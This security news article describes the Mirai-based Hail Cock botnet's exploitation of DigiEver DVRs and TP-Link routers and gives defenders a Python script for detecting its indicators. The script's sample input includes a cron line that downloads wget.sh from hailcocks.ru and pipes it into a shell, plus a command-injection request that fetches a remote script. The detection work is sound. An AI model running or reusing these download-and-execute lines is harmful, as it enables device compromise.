The Hail Cock Botnet, a new Mirai-based botnet, has been targeting vulnerable IoT devices such as DigiEver DVRs and TP-Link devices affected by CVE-2023-1389. Active since September 2024, it uses a Mirai variant with enhanced encryption to carry out its attacks.
In a recent surge of attacks, the botnet has focused on exploiting the URI /cgi-bin/cgi_main.cgi, taking advantage of an RCE vulnerability in DigiEver DS-2105 Pro devices. Although this vulnerability has no CVE assigned, it was previously disclosed by Ta-Lun Yen of TXOne Research.
The researcher who disclosed the vulnerability found that DigiEver DVRs exposed online carried the /cgi-bin/cgi_main.cgi endpoint in their firmware. By exploiting this endpoint, attackers were able to execute arbitrary code on the vulnerable devices, potentially gaining remote control or enabling data theft.
The botnet targets devices with known vulnerabilities, exploiting command injection flaws in DigiEver DVRs, TP-Link routers, and Tenda HG6 routers. The attackers inject commands that download malicious scripts from remote servers, which in turn fetch and execute the Mirai-based malware. They also target other vulnerabilities, such as CVE-2018-17532, using similar tactics.
The malware samples analyzed by security researchers use a multi-layer encryption scheme that combines XOR and ChaCha20. This level of encryption shows an evolution in the tactics botnet operators use to evade detection and hinder analysis.
Akamai analyzed the malware samples in a sandbox environment and observed the persistence mechanism the malware employs: it creates a cron job that downloads a shell script named “wget.sh” from a server at “hailcocks.ru” and executes it, likely establishing communication with the botnet’s C2 server at “kingstonwikkerink.dyn.”
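As an added illustration for defenders (not Akamai's tooling or code from the article), the following Python checks crontab entries and web-server access-log lines for the indicators named above: cron jobs that pull “wget.sh” from “hailcocks.ru” or reference “kingstonwikkerink.dyn”, and requests to /cgi-bin/cgi_main.cgi that carry shell metacharacters, the pattern of the command injection described earlier. The sample lines are constructed, and the query parameter name in the sample request is a placeholder, not the real one.

```python
import re

# Indicators named in the article (hosts, script and endpoint observed by Akamai).
C2_HOSTS = ("hailcocks.ru", "kingstonwikkerink.dyn")
DROPPER_SCRIPT = "wget.sh"
TARGET_URI = "/cgi-bin/cgi_main.cgi"

# Shell metacharacters (raw or URL-encoded) that signal command injection in a query string.
INJECTION_RE = re.compile(r"[;|`$]|%3b|%7c|%60|%24", re.IGNORECASE)
# A download piped straight into a shell, as in the observed cron job.
PIPE_TO_SHELL_RE = re.compile(r"\b(wget|curl)\b.*\|\s*(sh|bash)\b")

def check_cron_line(line: str) -> list[str]:
    """Return the reasons a crontab entry matches the persistence pattern from the article."""
    text = line.strip()
    if not text or text.startswith("#"):
        return []
    reasons = [f"references C2 host {h}" for h in C2_HOSTS if h in text]
    if DROPPER_SCRIPT in text:
        reasons.append(f"fetches {DROPPER_SCRIPT}")
    if PIPE_TO_SHELL_RE.search(text):
        reasons.append("pipes a download straight into a shell")
    return reasons

def check_access_line(line: str) -> list[str]:
    """Flag access-log lines that hit the exploited CGI endpoint, and note injection characters."""
    if TARGET_URI not in line:
        return []
    reasons = [f"request to {TARGET_URI}"]
    query = line.split(TARGET_URI, 1)[1]  # everything after the endpoint path
    if INJECTION_RE.search(query):
        reasons.append("shell metacharacters in request")
    return reasons

# Constructed sample input, not real captures; the query parameter name "x" is a placeholder.
SAMPLE_CRON = [
    "0 * * * * /usr/bin/backup.sh",
    "*/5 * * * * wget -q -O - http://hailcocks.ru/wget.sh | sh",
]
SAMPLE_ACCESS = [
    '10.0.0.5 - - [01/Dec/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Dec/2024:10:00:01 +0000] "GET /cgi-bin/cgi_main.cgi?x=a;wget+http://203.0.113.1/s.sh HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for lines, checker in ((SAMPLE_CRON, check_cron_line), (SAMPLE_ACCESS, check_access_line)):
        for line in lines:
            if reasons := checker(line):
                print(line, "->", "; ".join(reasons))
```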
The malware also leaves distinctive marks in the console: older versions announce their affiliation with the “hail cock botnet,” while newer versions display a seemingly benign message, “I just wanna look after my cats, man.”
As the Hail Cock botnet shows, cybercriminals are taking advantage of obsolete hardware and firmware to build botnets. Devices like the outdated DigiEver DS-2105 Pro, which no longer receives security patches from its manufacturer, are ideal targets for attackers. To reduce the risk of falling victim to such attacks, users are advised to replace vulnerable devices with newer, more secure models, especially when the manufacturer no longer provides updates.
In conclusion, the emergence of the Hail Cock Botnet highlights the ongoing threat posed by cybercriminals targeting IoT devices with known vulnerabilities. Users must remain vigilant and take proactive steps to protect their devices from such attacks.